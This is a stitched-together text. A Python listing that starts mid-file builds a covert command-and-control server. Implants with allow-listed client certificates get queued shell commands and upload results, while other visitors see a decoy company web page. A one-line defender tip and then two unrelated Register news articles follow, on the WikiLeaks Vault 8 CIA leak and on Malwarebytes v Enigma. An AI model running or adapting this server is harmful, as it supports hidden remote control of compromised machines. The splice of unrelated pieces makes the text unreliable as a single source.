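# Constructed allow-list: subject CNs that the operator's private CA has
# issued to implants and consoles. Anything else is a passer-by.
AUTHORISED_CLIENT_CNS = frozenset({"implant-0417", "operator-console"})

# Constructed tasking queue keyed by implant CN.
TASKING: Dict[str, List[str]] = {"implant-0417": ["uname -a", "ls /tmp"]}

COVER_PAGE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
    b"<html><body>Welcome to Dull Widgets Ltd.</body></html>"
)


def optional_client_auth_context(cafile: Optional[str] = None) -> ssl.SSLContext:
    """Server-side context that *requests* a client certificate in the
    handshake but lets clients that send none through (CERT_OPTIONAL).
    A certificate that is presented must chain to `cafile`; an invalid
    one aborts the handshake rather than reaching application code."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if cafile is not None:
        ctx.load_verify_locations(cafile)
    ctx.verify_mode = ssl.CERT_OPTIONAL
    return ctx


def subject_cn(peer_cert: Optional[dict]) -> Optional[str]:
    """Pull commonName out of SSLSocket.getpeercert() output.
    getpeercert() gives None when no certificate was sent and a dict
    shaped like {'subject': ((('commonName', 'x'),), ...)} when one was
    validated, so a missing CN simply means 'not one of ours'."""
    if not peer_cert:
        return None
    for rdn in peer_cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                return value
    return None


def handle_command(cn: str, request_line: str) -> bytes:
    """Tasking channel: 'op=beacon' hands back queued commands for this
    implant, 'op=result' accepts an upload. Assumed URL scheme."""
    target = request_line.split(" ")[1] if " " in request_line else request_line
    op = parse_qs(urlparse(target).query).get("op", ["beacon"])[0]
    if op == "beacon":
        body = "\n".join(TASKING.get(cn, [])).encode()
    elif op == "result":
        body = b"stored"
    else:
        body = b"unknown op"
    return b"HTTP/1.1 200 OK\r\nContent-Type: text/plain\r\n\r\n" + body


def route(peer_cert: Optional[dict], request_line: str) -> Tuple[str, bytes]:
    """Pick which face of the server this connection sees.
    Returns (channel, raw HTTP response)."""
    cn = subject_cn(peer_cert)
    if cn in AUTHORISED_CLIENT_CNS:
        return "command", handle_command(cn, request_line)
    # Everyone else, including a validated certificate with an unknown CN,
    # gets the cover page: never hint that a second channel exists.
    return "cover", COVER_PAGE


def serve(host: str, port: int, certfile: str, keyfile: str, cafile: str) -> None:
    """Single-threaded listener tying the pieces together (paths assumed)."""
    ctx = optional_client_auth_context(cafile)
    ctx.load_cert_chain(certfile, keyfile)
    with socket.create_server((host, port)) as lsock:
        while True:
            conn, _ = lsock.accept()
            try:
                with ctx.wrap_socket(conn, server_side=True) as tls:
                    first_line = tls.recv(4096).split(b"\r\n", 1)[0]
                    _, response = route(tls.getpeercert(), first_line.decode(errors="replace"))
                    tls.sendall(response)
            except (ssl.SSLError, OSError):
                pass  # a bad client certificate fails the handshake; drop quietly


if __name__ == "__main__":
    # Assumed file names; generate a server cert and a private client CA first.
    serve("0.0.0.0", 8443, "server.pem", "server.key", "operator-ca.pem")
```

The defender-side takeaway is that the handshake itself is observable: a plain web server almost never sends a CertificateRequest, so a site that does, yet happily serves content to clients that ignore it, is worth a second look.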

The Vault 8 dump is the latest attempt by WikiLeaks to shed light on the CIA’s covert online operations. Previous leaks have included details on the American government’s use of forensics tools, zero-day exploits, and infection techniques. The spying agency declined to comment. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/09/wikileaks_cia_spyware/

Judge bins sueball lobbed at Malwarebytes by rival antivirus maker for torpedoing its tool

Security software slinger Enigma has lost a key legal battle against antivirus maker Malwarebytes, which blocks and deletes Enigma’s products from PCs.

Florida-based Enigma Software Group, which touts tools Spyhunter and RegHunter that claim to remove software nasties from Windows computers, sued Malwarebytes in San Jose, California, claiming, among other things, tortious interference with its business. At the heart of the matter was Enigma’s fury at having its code labeled a “potentially unwanted program” by Malwarebytes, leading to its automatic quarantining and deletion by the latter’s antivirus scanner.

Enigma claimed Malwarebytes’ decision to rid PCs of its gear was a malicious act, arguing its software wasn’t a legitimate threat to computer users. It claimed Malwarebytes’ blockade was a retaliatory strike after Enigma sued a tech support blog that published a bad review of Spyhunter and was affiliated with Malwarebytes.

This week, District Judge Edward Davila dismissed Enigma’s case against Malwarebytes, citing the 2009 ruling of Zango v Kaspersky which bore striking similarities to this legal bout. Then, as now, the courts sided with security companies as having a legitimate defense under the Communications Decency Act.

“The reality is that this is not only a critical win for Malwarebytes, but for all security providers who will continue to have legal protection to do what is right for their users,” said Marcin Kleczynski, CEO of Malwarebytes, on Thursday. “This decision affirms our right to enable users by giving them a choice on what belongs on their machines and what doesn’t.”

Enigma’s Spyhunter has garnered mixed reviews because it’s a free malware scanner that charges a subscription fee if you want to remove any nasties it finds. Some users have also reported that it is difficult to remove once installed.

Enigma plans to appeal the ruling. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2017/11/10/malwarebytes_enigma/